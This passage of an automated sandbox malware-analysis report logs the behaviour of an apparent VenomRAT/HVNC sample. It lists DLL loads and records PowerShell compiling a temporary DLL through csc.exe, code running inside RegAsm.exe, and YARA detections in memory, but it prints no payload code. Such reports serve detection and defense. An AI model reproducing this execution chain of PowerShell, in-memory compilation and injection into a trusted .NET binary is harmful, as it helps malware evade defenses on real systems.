            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devenum.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msdmo.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mmdevapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb source: powershell.exe, 00000000.00000002.1317149566.00000219C381B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdb` source: powershell.exe, 00000000.00000002.1317149566.00000219C381B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.pdbhP source: powershell.exe, 00000000.00000002.1283601445.00000219ACD98000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC5156DB push eax; iretd 0_2_00007FFAAC5156F1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC5E00DD pushad ; ret 0_2_00007FFAAC5E00FB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC5E23FE push 8B485F92h; iretd 0_2_00007FFAAC5E2403
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC5E0065 pushad ; ret 0_2_00007FFAAC5E00FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_06914571 push es; ret 10_2_06914580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_06911EA8 push es; ret 10_2_06911E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_06911E30 push es; ret 10_2_06911E40
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.dllJump to dropped file

            Boot Survival

            barindex
            Yara detected VenomRAT
            Source: Yara matchFile source: 0.2.powershell.exe.219bbf8cb0a.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bb89f062.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbb6b348.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.219bbc8f0d2.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3679573960.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7356, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
